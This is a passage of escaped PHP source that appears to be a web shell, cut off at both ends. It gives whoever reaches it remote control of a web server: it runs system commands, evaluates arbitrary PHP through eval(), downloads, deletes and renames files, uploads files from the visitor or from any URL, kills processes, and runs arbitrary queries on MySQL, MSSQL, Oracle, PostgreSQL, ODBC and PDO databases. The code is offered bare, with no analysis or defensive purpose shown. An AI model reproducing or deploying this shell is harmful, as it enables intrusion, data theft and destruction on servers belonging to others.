$data; exit; } if($s_auth){ $s_software = getenv("SERVER_SOFTWARE"); if (ini_get("safe_mode") or strtolower(ini_get("safe_mode")) == "on") $s_safemode = TRUE; else $s_safemode = FALSE; $s_system = php_uname(); $s_win = FALSE; if(strtolower(substr($s_system,0,3)) == "win") $s_win = TRUE; $letters = \'\'; if(!$s_win){ if(!$s_user = rp(exe("whoami"))) $s_user = ""; if(!$s_id = rp(exe("id"))) $s_id = ""; $pwd = getcwd().DIRECTORY_SEPARATOR; } else { $s_user = get_current_user(); $s_id = $s_user; $pwd = realpath(".")."\\\\"; $v = explode("\\\\",$d); $v = $v[0]; foreach (range("A","Z") as $letter){ $bool = @is_dir($letter.":\\\\"); if ($bool){ $letters .= "<a href=\\"?d=".$letter.":\\\\\\">[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "<span class=\\"gaya\\">".$letter."</span>";} $letters .= " ]</a> "; } } } $s_prompt = $s_user." >"; if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $s_posix = TRUE; else $s_posix = FALSE; $s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]); $s_my_ip = $_SERVER[\'REMOTE_ADDR\']; if(isset($_REQUEST[\'d\'])){ $d = ss($_REQUEST[\'d\']); if(is_dir($d)){ chdir($d); $pwd = cp($d); } } else $pwd = cp(getcwd()); if(isset($_REQUEST[\'sorttable\'])){ $data = gzinflate(base64_decode($sortable_js)); header("Content-type: text/plain"); header("Cache-control: public"); echo $data; exit; } if(isset($_REQUEST[\'dl\']) && ($_REQUEST[\'dl\'] != "")){ $f = ss($_REQUEST[\'dl\']); $fc = file_get_contents($f); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($fc)); header("Content-disposition: attachment; filename=\\"".basename($f)."\\";"); echo $fc; exit; } elseif(isset($_REQUEST[\'dlgzip\']) && ($_REQUEST[\'dlgzip\'] != "")){ $f = ss($_REQUEST[\'dlgzip\']); $fc = gzencode(file_get_contents($f)); header("Content-Type:application/x-gzip\\n"); header("Content-length: ".strlen($fc)); header("Content-disposition: attachment; filename=\\"".basename($f).".gz\\";"); echo $fc; exit; } if(isset($_REQUEST[\'pid\'])){ $p = ss($_REQUEST[\'pid\']); if(function_exists("posix_kill")) posix_kill($p,\'9\'); else{ exe("kill -9 ".$p); exe("taskkill /F /PID ".$p); } } if(isset($_REQUEST[\'img\'])){ ob_clean(); $d = ss($_REQUEST[\'d\']); $f = ss($_REQUEST[\'img\']); $inf = getimagesize($d.$f); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; header("Content-type: ".$inf["mime"]); header("Cache-control: public"); header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); header("Cache-control: max-age=".(60*60*24*7)); readfile($d.$f); exit; } if(isset($_REQUEST[\'rename\']) && isset($_REQUEST[\'oldname\']) && isset($_REQUEST[\'newname\'])){ $old = ss($_REQUEST[\'oldname\']); $new = ss($_REQUEST[\'newname\']); rename($pwd.$old,$pwd.$new); $fnew = $pwd.$new; } if(isset($_REQUEST[\'delete\']) && ($_REQUEST[\'delete\'] != "")){ $f = ss($_REQUEST[\'delete\']); if(is_file($f)) unlink($f); } elseif(isset($_REQUEST[\'rmdir\']) && ($_REQUEST[\'rmdir\'] != "")){ $f = ss(rtrim(ss($_REQUEST[\'rmdir\'],DIRECTORY_SEPARATOR))); if(is_dir($f)) rmdirs($f); } elseif(isset($_REQUEST[\'mkdir\']) && ($_REQUEST[\'mkdir\'] != "")){ $f = ss($pwd.ss($_REQUEST[\'mkdir\'])); if(!is_dir($f)) mkdir($f); } $s_result = ""; if(isset($_REQUEST[\'eval\'])){ $c = ""; if(isset($_REQUEST[\'evalcode\'])){ $c = ss($_REQUEST[\'evalcode\']); ob_start(); eval($c); $b = ob_get_contents(); ob_end_clean(); $c = $b; } $s_result .= " <form action=\\"?\\" method=\\"post\\">\r\n <textarea id=\\"evalcode\\" name=\\"evalcode\\" class=\\"evalcode\\">".htmlspecialchars($code)."</textarea>\r\n <p><input type=\\"submit\\" name=\\"evalcodesubmit\\" class=\\"inputzbut\\" value=\\"Go !\\" style=\\"width:120px;height:30px;\\" /></p>\r\n <input type=\\"hidden\\" name=\\"eval\\" value=\\"\\" />\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n </form>\r\n "; } elseif(isset($_REQUEST[\'upload\'])){ $s_result = " "; $msg = ""; if(isset($_REQUEST[\'uploadhd\'])){ $fn = $_FILES[\'filepath\'][\'name\']; if(is_uploaded_file($_FILES[\'filepath\'][\'tmp_name\'])){ $p = cp(ss($_REQUEST[\'savefolder\'])); if(!is_dir($p)) $p = cp(dirname($p)); if(isset($_REQUEST[\'savefilename\']) && (trim($_REQUEST[\'savefilename\'])!="")) $fn = ss($_REQUEST[\'savefilename\']); $tm = $_FILES[\'filepath\'][\'tmp_name\']; $pi = cp($p).$fn; $st = move_uploaded_file($tm,$pi); if($st) $msg = "<p class=\\"rs_result\\">file uploaded to <a href=\\"?d=".$pwd."&view=".$pi."\\">".$pi."</a></p>"; else $msg = "<p class=\\"rs_result\\">failed to upload ".$fn."</p>"; } else $msg = "<p class=\\"rs_result\\">failed to upload ".$fn."</p>"; } elseif(isset($_REQUEST[\'uploadurl\'])){ $p = cp(ss($_REQUEST[\'savefolderurl\'])); if(!is_dir($p)) $p = cp(dirname($p)); $fu = ss($_REQUEST[\'fileurl\']); $fn = basename($fu); if(isset($_REQUEST[\'savefilenameurl\']) && (trim($_REQUEST[\'savefilenameurl\'])!="")) $fn = ss($_REQUEST[\'savefilenameurl\']); $fp = cp($p).$fn; $st = dlfile($fu,$fp); if($st) $msg = "<p class=\\"rs_result\\">file uploaded to <a href=\\"?d=".$pwd."&view=".$fp."\\">".$fp."</a></p>"; else $msg = "<p class=\\"rs_result\\">failed to upload ".$fn."</p>"; } $s_result .= $msg; $s_result .= "\r\n <form action=\\"?upload\\" method=\\"post\\" enctype=\\"multipart/form-data\\">\r\n <div class=\\"mybox\\"><h2>Upload from computer</h2>\r\n <table class=\\"myboxtbl\\">\r\n <tr><td style=\\"width:100px;\\">File</td><td><input type=\\"file\\" name=\\"filepath\\" class=\\"inputzbut\\" style=\\"width:400px;margin:0;\\" />\r\n </td></tr>\r\n <tr><td>Save to</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"savefolder\\" value=\\"".$pwd."\\" /></td></tr>\r\n <tr><td>Filename (optional)</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"savefilename\\" value=\\"\\" /></td></tr>\r\n <tr><td> </td><td>\r\n <input type=\\"submit\\" name=\\"uploadhd\\" class=\\"inputzbut\\" value=\\"Upload !\\" style=\\"width:120px;height:30px;margin:10px 2px 0 2px;\\" />\r\n </td></tr>\r\n \r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n </table>\r\n </div>\r\n </form>\r\n \r\n <form action=\\"?upload\\" method=\\"post\\">\r\n <div class=\\"mybox\\"><h2>Upload from internet</h2>\r\n <table class=\\"myboxtbl\\">\r\n <tr><td style=\\"width:100px;\\">File URL</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"fileurl\\" value=\\"\\" />\r\n </td></tr>\r\n <tr><td>Save to</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"savefolderurl\\" value=\\"".$pwd."\\" /></td></tr>\r\n <tr><td>Filename (optional)</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"savefilenameurl\\" value=\\"\\" /></td></tr>\r\n <tr><td> </td><td>\r\n <input type=\\"submit\\" name=\\"uploadurl\\" class=\\"inputzbut\\" value=\\"Upload !\\" style=\\"width:120px;height:30px;margin:10px 2px 0 2px;\\" />\r\n </td></tr>\r\n \r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n </table>\r\n </div>\r\n </form>\r\n \r\n "; } elseif(isset($_REQUEST[\'phpinfo\'])){ ob_start(); eval("phpinfo();"); $b = ob_get_contents(); ob_end_clean(); $a = strpos($b,"<body>")+6; $z = strpos($b,"</body>"); $s_result = "<div class=\\"phpinfo\\">".substr($b,$a,$z-$a)."</div>"; } elseif(isset($_REQUEST[\'db\'])){ $sqlhost = $sqlhost1 = $sqlhost2 = $sqlhost3 = $sqlhost4 = \'localhost\'; $sqluser = $sqluser1 = $sqluser2 = $sqluser3 = $sqluser4 = $odbcuser = $odbcdsn = $pdodsn = $pdouser = \'\'; $sqlport = $sqlport1 = $sqlport2 = $sqlport3 = $sqlport4 = \'\'; $sqlpass = $sqlpass1 = $sqlpass2 = $sqlpass3 = $sqlpass4 = $odbcpass = $pdopass = \'\'; if(isset($_REQUEST[\'mysqlcon\'])&&isset($_REQUEST[\'sqlhost1\'])) $sqlhost = $sqlhost1 = ss($_REQUEST[\'sqlhost1\']); if(isset($_REQUEST[\'mssqlcon\'])&&isset($_REQUEST[\'sqlhost2\'])) $sqlhost = $sqlhost2 = ss($_REQUEST[\'sqlhost2\']); if(isset($_REQUEST[\'pgsqlcon\'])&&isset($_REQUEST[\'sqlhost3\'])) $sqlhost = $sqlhost3 = ss($_REQUEST[\'sqlhost3\']); if(isset($_REQUEST[\'oraclecon\'])&&isset($_REQUEST[\'sqlhost4\'])) $sqlhost = $sqlhost4 = ss($_REQUEST[\'sqlhost4\']); if(isset($_REQUEST[\'odbccon\'])&&isset($_REQUEST[\'odbcdsn\'])) $odbcdsn = ss($_REQUEST[\'odbcdsn\']); if(isset($_REQUEST[\'pdocon\'])&&isset($_REQUEST[\'pdodsn\'])) $pdodsn = ss($_REQUEST[\'pdodsn\']); if(isset($_REQUEST[\'sqlhost\'])) $sqlhost = ss($_REQUEST[\'sqlhost\']); if(isset($_REQUEST[\'mysqlcon\'])&&isset($_REQUEST[\'sqluser1\'])) $sqluser = $sqluser1 = ss($_REQUEST[\'sqluser1\']); if(isset($_REQUEST[\'mssqlcon\'])&&isset($_REQUEST[\'sqluser2\'])) $sqluser = $sqluser2 = ss($_REQUEST[\'sqluser2\']); if(isset($_REQUEST[\'pgsqlcon\'])&&isset($_REQUEST[\'sqluser3\'])) $sqluser = $sqluser3 = ss($_REQUEST[\'sqluser3\']); if(isset($_REQUEST[\'oraclecon\'])&&isset($_REQUEST[\'sqluser4\'])) $sqluser = $sqluser4 = ss($_REQUEST[\'sqluser4\']); if(isset($_REQUEST[\'odbccon\'])&&isset($_REQUEST[\'odbcuser\'])) $odbcuser = ss($_REQUEST[\'odbcuser\']); if(isset($_REQUEST[\'pdocon\'])&&isset($_REQUEST[\'pdouser\'])) $pdouser = ss($_REQUEST[\'pdouser\']); if(isset($_REQUEST[\'sqluser\'])) $sqluser = ss($_REQUEST[\'sqluser\']); if(isset($_REQUEST[\'mysqlcon\'])&&isset($_REQUEST[\'sqlport1\'])) $sqlport = $sqlport1 = ss($_REQUEST[\'sqlport1\']); if(isset($_REQUEST[\'mssqlcon\'])&&isset($_REQUEST[\'sqlport2\'])) $sqlport = $sqlport2 = ss($_REQUEST[\'sqlport2\']); if(isset($_REQUEST[\'pgsqlcon\'])&&isset($_REQUEST[\'sqlport3\'])) $sqlport = $sqlport3 = ss($_REQUEST[\'sqlport3\']); if(isset($_REQUEST[\'oraclecon\'])&&isset($_REQUEST[\'sqlport4\'])) $sqlport = $sqlport4 = ss($_REQUEST[\'sqlport4\']); if(isset($_REQUEST[\'sqlport\'])) $sqlport = ss($_REQUEST[\'sqlport\']); if(isset($_REQUEST[\'mysqlcon\'])&&isset($_REQUEST[\'sqlpass1\'])) $sqlpass = $sqlpass1 = ss($_REQUEST[\'sqlpass1\']); if(isset($_REQUEST[\'mssqlcon\'])&&isset($_REQUEST[\'sqlpass2\'])) $sqlpass = $sqlpass2 = ss($_REQUEST[\'sqlpass2\']); if(isset($_REQUEST[\'pgsqlcon\'])&&isset($_REQUEST[\'sqlpass3\'])) $sqlpass = $sqlpass3 = ss($_REQUEST[\'sqlpass3\']); if(isset($_REQUEST[\'oraclecon\'])&&isset($_REQUEST[\'sqlpass4\'])) $sqlpass = $sqlpass4 = ss($_REQUEST[\'sqlpass4\']); if(isset($_REQUEST[\'odbccon\'])&&isset($_REQUEST[\'odbcpass\'])) $odbcpass = ss($_REQUEST[\'odbcpass\']); if(isset($_REQUEST[\'pdocon\'])&&isset($_REQUEST[\'pdopass\'])) $pdopass = ss($_REQUEST[\'pdopass\']); if(isset($_REQUEST[\'sqlpass\'])&&isset($_REQUEST[\'sqlpass\'])) $sqlpass = ss($_REQUEST[\'sqlpass\']); $sqls = ""; $q_result = ""; $hostandport = $sqlhost; if(trim($sqlport)!="") $hostandport = $sqlhost.":".$sqlport; if(isset($_REQUEST[\'mysqlcon\']) && ($con = mysql_connect($hostandport,$sqluser,$sqlpass))){ if(isset($_REQUEST[\'sqlcode\'])){ $sqls = ss($_REQUEST[\'sqlcode\']); $querys = explode(";",$sqls); foreach($querys as $query){ if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $q_result .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; \r\n <span class=\\"gaya\\">[</span> ok <span class=\\"gaya\\">]</span></p>\r\n <table class=\\"explore\\" style=\\"width:99%;\\"><tr>"; for($i=0;$i<mysql_num_fields($hasil);$i++) $q_result .= "<th>".htmlspecialchars(mysql_field_name($hasil,$i))."</th>"; $q_result .= "</tr>"; while($rows=mysql_fetch_array($hasil)){ $q_result .= "<tr>"; for($j=0;$j<mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j]; $q_result .= "<td>".htmlspecialchars($dataz)."</td>"; } $q_result .= "</tr>"; } $q_result .= "</table>"; } else $q_result .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; \r\n <span class=\\"gaya\\">[</span> error <span class=\\"gaya\\">]</span></p>"; } } } else $sqls = "SHOW databases;"; $s_result .= " <form action=\\"?db\\" method=\\"post\\">\r\n <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" />\r\n <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" />\r\n <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" />\r\n <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" />\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n <textarea id=\\"sqlcode\\" name=\\"sqlcode\\" class=\\"evalcode\\" style=\\"height:10em;\\">".$sqls."</textarea>\r\n <p><input type=\\"submit\\" name=\\"mysqlcon\\" class=\\"inputzbut\\" value=\\"Go !\\" style=\\"width:120px;height:30px;\\" />\r\n Separate multiple commands with a semicolon <span class=\\"gaya\\">[</span> ; <span class=\\"gaya\\">]</span></p>\r\n </form>"; $s_result .= "<div>".$q_result."</div>"; if($con) mysql_close($con); } elseif(isset($_REQUEST[\'mssqlcon\']) && ($con = mssql_connect($hostandport,$sqluser,$sqlpass))){ if(isset($_REQUEST[\'sqlcode\'])){ $sqls = ss($_REQUEST[\'sqlcode\']); $querys = explode(";",$sqls); foreach($querys as $query){ if(trim($query) != ""){ $hasil = mssql_query($query); if($hasil){ $q_result .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; \r\n <span class=\\"gaya\\">[</span> ok <span class=\\"gaya\\">]</span></p>\r\n <table class=\\"explore\\" style=\\"width:99%;\\"><tr>"; for($i=0;$i<mssql_num_fields($hasil);$i++) $q_result .= "<th>".htmlspecialchars(mssql_field_name($hasil,$i))."</th>"; $q_result .= "</tr>"; while($rows=mssql_fetch_array($hasil)){ $q_result .= "<tr>"; for($j=0;$j<mssql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j]; $q_result .= "<td>".htmlspecialchars($dataz)."</td>"; } $q_result .= "</tr>"; } $q_result .= "</table>"; } else $q_result .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; \r\n <span class=\\"gaya\\">[</span> error <span class=\\"gaya\\">]</span></p>"; } } } else $sqls = "EXEC sp_databases;"; $s_result .= " <form action=\\"?db\\" method=\\"post\\">\r\n <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" />\r\n <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" />\r\n <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" />\r\n <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" />\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n <textarea id=\\"sqlcode\\" name=\\"sqlcode\\" class=\\"evalcode\\" style=\\"height:10em;\\">".$sqls."</textarea>\r\n <p><input type=\\"submit\\" name=\\"mssqlcon\\" class=\\"inputzbut\\" value=\\"Go !\\" style=\\"width:120px;height:30px;\\" />\r\n Separate multiple commands with a semicolon <span class=\\"gaya\\">[</span> ; <span class=\\"gaya\\">]</span></p>\r\n </form>"; $s_result .= "<div>".$q_result."</div>"; if($con) mssql_close($con); } elseif(isset($_REQUEST[\'oraclecon\']) && ($con = oci_connect($sqluser,$sqlpass,$hostandport))){ if(isset($_REQUEST[\'sqlcode\'])){ $sqls = ss($_REQUEST[\'sqlcode\']); $querys = explode(";",$sqls); foreach($querys as $query){ if(trim($query) != ""){ $st = oci_parse($con, $query); if(oci_execute($st)){ $q_result .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; \r\n <span class=\\"gaya\\">[</span> ok <span class=\\"gaya\\">]</span></p>\r\n <table class=\\"explore\\" style=\\"width:99%;\\"><tr>"; for($i=1;$i<=oci_num_fields($st);$i++) $q_result .= "<th>".htmlspecialchars(oci_field_name($st,$i))."</th>"; $q_result .= "</tr>"; while($rows=oci_fetch_array($st)){ $q_result .= "<tr>"; for($j=0;$j<oci_num_fields($st);$j++) { if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j]; $q_result .= "<td>".htmlspecialchars($dataz)."</td>"; } $q_result .= "</tr>"; } $q_result .= "</table>"; } else $q_result .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; \r\n <span class=\\"gaya\\">[</span> error <span class=\\"gaya\\">]</span></p>"; } } } else $sqls = "SELECT * FROM user_tablespaces;"; $s_result .= " <form action=\\"?db\\" method=\\"post\\">\r\n <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" />\r\n <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" />\r\n <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" />\r\n <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" />\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n <textarea id=\\"sqlcode\\" name=\\"sqlcode\\" class=\\"evalcode\\" style=\\"height:10em;\\">".$sqls."</textarea>\r\n <p><input type=\\"submit\\" name=\\"oraclecon\\" class=\\"inputzbut\\" value=\\"Go !\\" style=\\"width:120px;height:30px;\\" />\r\n Separate multiple commands with a semicolon <span class=\\"gaya\\">[</span> ; <span class=\\"gaya\\">]</span></p>\r\n </form>"; $s_result .= "<div>".$q_result."</div>"; if($con) oci_close($con); } elseif(isset($_REQUEST[\'pgsqlcon\']) && ($con = pg_connect("host=$sqlhost user=$sqluser password=$sqlpass port=$sqlport"))){ if(isset($_REQUEST[\'sqlcode\'])){ $sqls = ss($_REQUEST[\'sqlcode\']); $querys = explode(";",$sqls); foreach($querys as $query){ if(trim($query) != ""){ $hasil = pg_query($query); if($hasil){ $q_result .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; \r\n <span class=\\"gaya\\">[</span> ok <span class=\\"gaya\\">]</span></p>\r\n <table class=\\"explore\\" style=\\"width:99%;\\"><tr>"; for($i=0;$i<pg_num_fields($hasil);$i++) $q_result .= "<th>".htmlspecialchars(pg_field_name($hasil,$i))."</th>"; $q_result .= "</tr>"; while($rows=pg_fetch_array($hasil)){ $q_result .= "<tr>"; for($j=0;$j<pg_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j]; $q_result .= "<td>".htmlspecialchars($dataz)."</td>"; } $q_result .= "</tr>"; } $q_result .= "</table>"; } else $q_result .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; \r\n <span class=\\"gaya\\">[</span> error <span class=\\"gaya\\">]</span></p>"; } } } } elseif(isset($_REQUEST[\'odbccon\']) && ($con = odbc_connect($odbcdsn,$odbcuser,$odbcpass))){ if(isset($_REQUEST[\'sqlcode\'])){ $sqls = ss($_REQUEST[\'sqlcode\']); $querys = explode(";",$sqls); foreach($querys as $query){ if(trim($query) != ""){ $hasil = odbc_exec($con, $query); if($hasil){ $q_result .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; \r\n <span class=\\"gaya\\">[</span> ok <span class=\\"gaya\\">]</span></p>\r\n <table class=\\"explore\\" style=\\"width:99%;\\"><tr>"; for($i=1;$i<=odbc_num_fields($hasil);$i++) $q_result .= "<th>".htmlspecialchars(odbc_field_name($hasil,$i))."</th>"; $q_result .= "</tr>"; while($rows=odbc_fetch_array($hasil)){ $q_result .= "<tr>"; foreach($rows as $r) { if($r == "") $dataz = " "; else $dataz = $r; $q_result .= "<td>".htmlspecialchars($dataz)."</td>"; } $q_result .= "</tr>"; } $q_result .= "</table>"; } else $q_result .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; \r\n <span class=\\"gaya\\">[</span> error <span class=\\"gaya\\">]</span></p>"; } } } else $sqls = ""; $s_result .= " <form action=\\"?db\\" method=\\"post\\">\r\n <input type=\\"hidden\\" name=\\"odbcdsn\\" value=\\"".$odbcdsn."\\" />\r\n <input type=\\"hidden\\" name=\\"odbcuser\\" value=\\"".$odbcuser."\\" />\r\n <input type=\\"hidden\\" name=\\"odbcpass\\" value=\\"".$odbcpass."\\" />\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n <textarea id=\\"sqlcode\\" name=\\"sqlcode\\" class=\\"evalcode\\" style=\\"height:10em;\\">".$sqls."</textarea>\r\n <p><input type=\\"submit\\" name=\\"odbccon\\" class=\\"inputzbut\\" value=\\"Go !\\" style=\\"width:120px;height:30px;\\" />\r\n Separate multiple commands with a semicolon <span class=\\"gaya\\">[</span> ; <span class=\\"gaya\\">]</span></p>\r\n </form>"; $s_result .= "<div>".$q_result."</div>"; if($con) odbc_close($con); } else{ if(isset($_REQUEST[\'pdocon\'])){ try{ $mypdo = new PDO($pdodsn,$pdouser,$pdopass); if(isset($_REQUEST[\'sqlcode\'])){ $sqls = ss($_REQUEST[\'sqlcode\']); $querys = explode(";",$sqls); foreach($querys as $query){ if(trim($query) != ""){ if($hasil = $mypdo->query($query)){ $q_result .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; \r\n <span class=\\"gaya\\">[</span> ok <span class=\\"gaya\\">]</span></p>\r\n <table class=\\"explore\\" style=\\"width:99%;\\"><tr>"; $r = $hasil->fetch(PDO::FETCH_ASSOC); $savefirstrow = array(); foreach($r as $fn=>$fv){ $q_result .= "<th>".htmlspecialchars($fn)."</th>"; $savefirstrow[] = $fv; } $q_result .= "</tr><tr>"; foreach($savefirstrow as $fv){ $q_result .= "<td>".htmlspecialchars($fv)."</td>"; } $q_result .= "</tr>"; while($rows = $hasil->fetch(PDO::FETCH_ASSOC)){ $q_result .= "<tr>"; foreach($rows as $r) { if($r == "") $dataz = " "; else $dataz = $r; $q_result .= "<td>".htmlspecialchars($dataz)."</td>"; } $q_result .= "</tr>"; } $q_result .= "</table>"; } else{ $q_result .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; \r\n <span class=\\"gaya\\">[</span> error <span class=\\"gaya\\">]</span></p>"; } $q_result .= "</table>"; } } } else $sqls = ""; $s_result .= " <form action=\\"?db\\" method=\\"post\\">\r\n <input type=\\"hidden\\" name=\\"pdodsn\\" value=\\"".$pdodsn."\\" />\r\n <input type=\\"hidden\\" name=\\"pdouser\\" value=\\"".$pdouser."\\" />\r\n <input type=\\"hidden\\" name=\\"pdopass\\" value=\\"".$pdopass."\\" />\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n <textarea id=\\"sqlcode\\" name=\\"sqlcode\\" class=\\"evalcode\\" style=\\"height:10em;\\">".$sqls."</textarea>\r\n <p><input type=\\"submit\\" name=\\"pdocon\\" class=\\"inputzbut\\" value=\\"Go !\\" style=\\"width:120px;height:30px;\\" />\r\n Separate multiple commands with a semicolon <span class=\\"gaya\\">[</span> ; <span class=\\"gaya\\">]</span></p>\r\n </form>"; $s_result .= "<div>".$q_result."</div>"; } catch (PDOException $uck) { } } else{ $s_result .= "<div class=\\"mybox\\"><h2>connect to MySQL</h2>\r\n <form action=\\"?db\\" method=\\"post\\" />\r\n <table class=\\"myboxtbl\\">\r\n <tr><td style=\\"width:120px;\\">Host</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"sqlhost1\\" value=\\"".$sqlhost1."\\" /></td></tr>\r\n <tr><td>Username</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"sqluser1\\" value=\\"".$sqluser1."\\" /></td></tr>\r\n <tr><td>Password</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"password\\" name=\\"sqlpass1\\" value=\\"\\" /></td></tr>\r\n <tr><td>Port (optional)</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"sqlport1\\" value=\\"".$sqlport1."\\" /></td></tr>\r\n </table>\r\n <input type=\\"submit\\" name=\\"mysqlcon\\" class=\\"inputzbut\\" value=\\"Connect !\\" style=\\"width:120px;height:30px;margin:10px 2px 0 2px;\\" />\r\n </form>\r\n </div>"; $s_result .= "<div class=\\"mybox\\"><h2>connect to MsSQL</h2>\r\n <form action=\\"?db\\" method=\\"post\\" />\r\n <table class=\\"myboxtbl\\">\r\n <tr><td style=\\"width:120px;\\">Host</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"sqlhost2\\" value=\\"".$sqlhost2."\\" /></td></tr>\r\n <tr><td>Username</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"sqluser2\\" value=\\"".$sqluser2."\\" /></td></tr>\r\n <tr><td>Password</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"password\\" name=\\"sqlpass2\\" value=\\"\\" /></td></tr>\r\n <tr><td>Port (optional)</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"sqlport2\\" value=\\"".$sqlport2."\\" /></td></tr>\r\n </table>\r\n <input type=\\"submit\\" name=\\"mssqlcon\\" class=\\"inputzbut\\" value=\\"Connect !\\" style=\\"width:120px;height:30px;margin:10px 2px 0 2px;\\" />\r\n </form>\r\n </div>"; $s_result .= "<div class=\\"mybox\\"><h2>connect to PostgreSQL</h2>\r\n <form action=\\"?db\\" method=\\"post\\" />\r\n <table class=\\"myboxtbl\\">\r\n <tr><td style=\\"width:120px;\\">Host</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"sqlhost3\\" value=\\"".$sqlhost3."\\" /></td></tr>\r\n <tr><td>Username</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"sqluser3\\" value=\\"".$sqluser3."\\" /></td></tr>\r\n <tr><td>Password</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"password\\" name=\\"sqlpass3\\" value=\\"\\" /></td></tr>\r\n <tr><td>Port (optional)</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"sqlport3\\" value=\\"".$sqlport3."\\" /></td></tr>\r\n </table>\r\n <input type=\\"submit\\" name=\\"pgsqlcon\\" class=\\"inputzbut\\" value=\\"Connect !\\" style=\\"width:120px;height:30px;margin:10px 2px 0 2px;\\" />\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n </form>\r\n </div>"; $s_result .= "<div class=\\"mybox\\"><h2>connect to Oracle</h2>\r\n <form action=\\"?db\\" method=\\"post\\" />\r\n <table class=\\"myboxtbl\\">\r\n <tr><td style=\\"width:120px;\\">Host</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"sqlhost4\\" value=\\"".$sqlhost4."\\" /></td></tr>\r\n <tr><td>Username</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"sqluser4\\" value=\\"".$sqluser4."\\" /></td></tr>\r\n <tr><td>Password</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"password\\" name=\\"sqlpass4\\" value=\\"\\" /></td></tr>\r\n <tr><td>Port (optional)</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"sqlport4\\" value=\\"".$sqlport4."\\" /></td></tr>\r\n </table>\r\n <input type=\\"submit\\" name=\\"oraclecon\\" class=\\"inputzbut\\" value=\\"Connect !\\" style=\\"width:120px;height:30px;margin:10px 2px 0 2px;\\" />\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n </form>\r\n </div>"; $s_result .= "<div class=\\"mybox\\"><h2>connect using ODBC</h2>\r\n <form action=\\"?db\\" method=\\"post\\" />\r\n <table class=\\"myboxtbl\\">\r\n <tr><td style=\\"width:120px;\\">DSN / Connection String</td><td><input 